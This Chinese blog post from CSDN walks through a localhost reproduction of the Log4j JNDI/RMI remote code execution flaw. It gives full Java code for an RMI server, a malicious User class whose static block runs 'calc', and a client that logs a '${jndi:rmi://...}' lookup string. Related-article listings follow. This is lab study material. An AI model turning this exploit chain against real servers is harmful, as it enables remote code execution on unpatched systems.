Log4j rmi 漏洞测试

最新推荐文章于 2023-04-20 10:22:59 发布
最新推荐文章于 2023-04-20 10:22:59 发布
阅读量4.5k 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21299835/article/details/121964386
版权

晚上抽了个空,也来玩玩这个漏洞,步骤如下;

1.创建RMI服务

public class RmiServer {
    private static final Logger log = LogManager.getLogger();

    public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {

        Registry registry = LocateRegistry.createRegistry(1099);

        String url = "localhost";

        log.error("Create RMI registry on port 1099");

        Reference reference = new Reference("com.demo.User", "com.demo.User", url);

        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);

        registry.bind("nginx", referenceWrapper);

    }
}

2.创建User类

package com.demo;

import java.io.Serializable;

public class User implements Serializable {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

3.将编译好的User.class 放到nginx的html下并启动nginx,我这里带包名就要放置到对应的文件层级,如果没有包名则直接放到html根目录;

在这里插入图片描述

4.创建Client类

public class Client {
    private static final Logger log = LogManager.getLogger();

    public static void main(String[] args) {
        log.error("JDK版本  {} ...","${java:version}");

        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        log.error("${jndi:rmi://localhost:1099/nginx}");
    }

}

5.依次启动RmiServer和Client,效果如下:

在这里插入图片描述

小_北_辰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JNDI RMI 注入(Log4j2漏洞
sun0322
12-24 8061
目录 ■相关知识 1.SLF4J(Simple logging Facade for Java) // 简单日志门面 ■(log4j2)漏洞 ■JNDI 注入代码实现(RMI) ■代码细节说明 1.javax.naming.Reference // 构造方法 2.代码中使用的服务如何构建 SimpleHTTPServer // (Python)快速共享目录 3.RMI的利用版本限制 4.问答 5.RMI(Remote Method Invocation)为远程方法调用 ●在攻击..
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 7477
log4j漏洞原理和靶场复现
log4j漏洞原理分析&复现&检测&复盘
qq_43665434的博客
08-22 2741
log4j漏洞原理分析&复现&检测&复盘
log4j漏洞复现
weixin_68647219的博客
04-20 4456
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。
java~RMI引起的log4j漏洞
V539413949的博客
04-27 351
2021-12-10日左右,java的log4j框架出现了一个大漏洞,对服务器案例引起了不小的影响,当然只对于log4j的日志使用者来说,如果你是spring框架,用的是logback,不存在这个问题。 RMI和JNDI RMI(Remote Method Invocation) 即Java远程方法调用,一种用于实现远程过程调用的应用程序编程接口 JNDI (Java Naming and Directory Interface)是一个应用程序设计的API,为开发人员提供了查找和访问各种命名和目录服务的通用
java_rmi漏洞利用工具
05-31
本项目使用socket直接发送数据包来攻击rmi,通过反序列化攻击rmi,双击直接运行,对1099端口的rmi服务直接进行漏洞检测。
Log4j2、Fastjson、Log4j的BurpSuite插件亲测有效
06-07
Log4j2、Fastjson、Log4j的BurpSuite插件亲测有效,非常好用老版的BurpSuite和新版的都可以使用。祝大家挖洞顺利(工具仅用于学习交流)
javaRMI反序列化漏洞验证工具
08-21
检测javaRMI反序列化漏洞
RMIServer:RMI 服务器测试
06-06
RMI 服务器测试 首先,你可以添加lipeRMI-0.4.jar 因此,您必须运行 TestMain.java 这个项目是 Java Application ,你不需要 Java EE with Tomcat。 不要忘记提供正确的IP地址! (你的电脑地址不同)
log4j漏洞复现及前置知识
赵花花08042的博客
06-13 778
前言:我是觉得这个Remote Method Invocatioon,也就是远程方法调用, 和RPC(Remote Procedure Call)很像,RMI算是JAVA定制版RPC。一个完整的RMI
log4j测试示例
weixin_30367945的博客
05-25 404
引入依赖 <!-- log4j --> <dependency> <groupId>log4j</groupId> <artifactId>log4j</artifactId> <version>1.2.17</version> ...
Log4j漏洞复现
m1287578441的博客
06-08 2912
Log4j漏洞复现
Log4j2 RCE漏洞 JNDI RMI注入的简单复现案例
QDYoungK的博客
12-27 3473
Log4j2 JNDI RMI注入的简单复现案例
深入分析Log4j 漏洞
热门推荐
嘉禾笔记
12-16 1万+
几乎每个系统都会使用日志框架,用于记录日志信息,这些信息可以提供程序运行的上下文,但是日志过多也会影响系统的性能,所以好的日志框架应该是可靠,快速和可扩展的。 Apache Log4j2 是一个基于 Java 的日志工具,是Log4j的升级版本,引入了很多丰富的特性,包括高性能,低垃圾收集,插件系统等。目前很多互联网公司以及耳熟能详的公司的系统或者开源框架都在使用Log4j2。 2021.12.7,Log4j首次被发现了一个非常严重的漏洞,在当天Log4j就发布了log4j-2.15.0-rc1,但是12.
架构设计:系统间通信(8)——通信管理与RMI 上篇
10-22 293
1、概述 在概述了数据描述格式的基本知识、IO通信模型的基本知识后。我们终于可以进入这个系列博文的重点:系统间通信管理。在...
Java 常识(002):常用日志框架(log4j,slf4j,logback)有啥区别
码客
12-16 1084
1、概述 相信目前大多数情况下,不管是开源框架或是平时我们工作编码中都离不开一种框架,它就是日志框架。因此本节就简单了解一下我们常用日志框架的区别。 2、Commons Logging common-logging是apache提供的一个通用的日志接口, 在common-logging中,有一个Simple logger的简单实现,但是它功能很弱,所以使用common-logging,通常都是配合...
log4j2漏洞原理 利用方式 应用场景
最新发布
05-12
Log4j2 漏洞则是指在使用 Log4j2 版本小于 2.15.0 时,攻击者可以利用该漏洞通过构造恶意的日志信息来执行任意代码,从而控制受害者的服务器。 漏洞原理: Log4j2 框架中的 JNDI 注入漏洞是该漏洞的原因。攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值